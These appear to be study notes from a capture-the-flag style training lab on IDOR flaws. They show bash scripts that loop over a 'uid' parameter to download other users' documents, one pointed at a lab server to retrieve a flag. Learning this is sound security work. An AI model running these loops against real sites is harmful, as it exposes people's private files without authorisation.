# Intro

- Once we identify a potential IDOR, we can start testing it with basic techniques to see whether it exposes any other data
- For advanced IDOR attacks, we need a better understanding of how the web app works, how it calculates its object references, and how its access control system works, so that we can perform attacks that are not exploitable with basic techniques

# Insecure Parameters

- Our web application assumes that we are logged in as an employee with user id `uid=1` to simplify things
- In a real web app, this would require us to log in with credentials
![[images/Pasted image 20260110193324.png]]
- Once we click on Documents, we are redirected to `/documents.php`
![[images/Pasted image 20260110193351.png]]
- When we get to the `Documents` page, we see several documents that belong to our user
- These can be files uploaded by our user or files set for us by another department (e.g., the HR Department)
- Checking the file links by hovering over them with the mouse cursor, we see that they have individual names
```html
/documents/Invoice_1_09_2021.pdf
/documents/Report_1_10_2021.pdf
```
- The files follow a predictable naming pattern: each file name appears to use the user `uid` and the month/year, which may allow us to fuzz files belonging to other users
- This is the most basic type of IDOR vulnerability and is called a `static file IDOR`
- However, to successfully fuzz other files, we would have to assume that they all start with `Invoice` or `Report`, which may reveal some files but not all of them
- So, we need to look for a more solid IDOR vulnerability
- We see that the page sets our `uid` with a `GET` parameter in the URL (`documents.php?uid=1`)
- If the web app uses this `uid` GET parameter as a direct reference to the employee records it should show, we may be able to view other employees' documents by simply changing this value
- If the back end of the web application `does` have a proper access control
system, we will get some form of `Access Denied` error
- However, given that the web application passes our `uid` in cleartext as a direct reference, this may indicate poor web application design, leading to arbitrary access to employee records
- When changing `uid` to `?uid=2`, we don't notice any difference in the page output; we still get a list of documents and may assume they are our own
![[images/Pasted image 20260110193758.png]]
- However, when inspecting the documents more closely, we see that they are different documents belonging to the employee with `uid=2`
```html
/documents/Invoice_2_08_2020.pdf
/documents/Report_2_12_2020.pdf
```

# Mass Enumeration

- We can try manually accessing other employee documents with `uid=3`, `uid=4`, and so on
- However, manually accessing files is not efficient in a real work environment with hundreds or thousands of employees
- Instead, we can use `Burp Intruder` or `ZAP Fuzzer` to retrieve all files, or write a small bash script to download all files, which is what we will do
- Press [CTRL+SHIFT+C] to enable the `element inspector`, then click on any of the links to view their HTML source code, and we will get the following
```html
<li class='pure-tree_link'><a href='/documents/Invoice_3_06_2020.pdf' target='_blank'>Invoice</a></li>
<li class='pure-tree_link'><a href='/documents/Report_3_01_2020.pdf' target='_blank'>Report</a></li>
```
- Based on the above, each link starts with `<li class='pure-tree_link'>`, so we may `curl` the page and `grep` for this string as follows
```bash
curl -s "http://SERVER_IP:PORT/documents.php?uid=3" | grep "<li class='pure-tree_link'>"
```
- We can use a `Regex` pattern that matches strings between `/documents` and `.pdf`, which we can use with `grep` to extract only the document links
```bash
curl -s "http://SERVER_IP:PORT/documents.php?uid=3" | grep -oP "\/documents.*?\.pdf"
```
- Finally, we can use a `for` loop to loop over the `uid` parameter and return
the documents of all employees, and then use `wget` to download each document link
```bash
#!/bin/bash

url="http://SERVER_IP:PORT"

for i in {1..10}; do
        for link in $(curl -s "$url/documents.php?uid=$i" | grep -oP "\/documents.*?\.pdf"); do
                wget -q "$url$link"
        done
done
```

# Exercise

- `ping` test
![[images/Pasted image 20260110194641.png]]
- `nmap` scan
![[images/Pasted image 20260110194649.png]]
- visit `/documents.php`
- source code
![[images/Pasted image 20260110195056.png]]
- visit `/documents.php?uid=1`
- use the `for` loop below to get the list of documents for the first 20 `uid`s in `/documents.php`, where a `POST` method and the `uid` parameter are specified
```bash
#!/bin/bash

url="http://83.136.255.170:48584"

for i in {1..20}; do
        for link in $(curl -s -X POST "$url/documents.php" -d "uid=$i" | grep -oP "/documents.*?\.[a-z]{3}"); do
                wget -q "$url$link"
        done
done
```
- After running the above script, we have many Report and Invoice files in the local directory, as well as a `flag.txt` file
![[images/Pasted image 20260111195554.png]]
- `cat flag.txt`
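- As a quick offline sanity check of the link-extraction regex used in the scripts above, we can run the same `grep -oP` pattern against the sample HTML of the Documents page (no target server needed); the two sample links are the ones shown earlier for `uid=3`
```bash
#!/bin/bash
# Offline check of the link-extraction regex used in the download scripts.
# The HTML below is the sample source of the Documents page for uid=3.
html="<li class='pure-tree_link'><a href='/documents/Invoice_3_06_2020.pdf' target='_blank'>Invoice</a></li>
<li class='pure-tree_link'><a href='/documents/Report_3_01_2020.pdf' target='_blank'>Report</a></li>"

# Non-greedy match: each match starts at '/documents' and stops at the
# first '.pdf' that follows, so the surrounding HTML is stripped away
echo "$html" | grep -oP "/documents.*?\.pdf"
```
- Running this prints `/documents/Invoice_3_06_2020.pdf` and `/documents/Report_3_01_2020.pdf`, one per line, confirming the pattern isolates the document paths before we point it at the live target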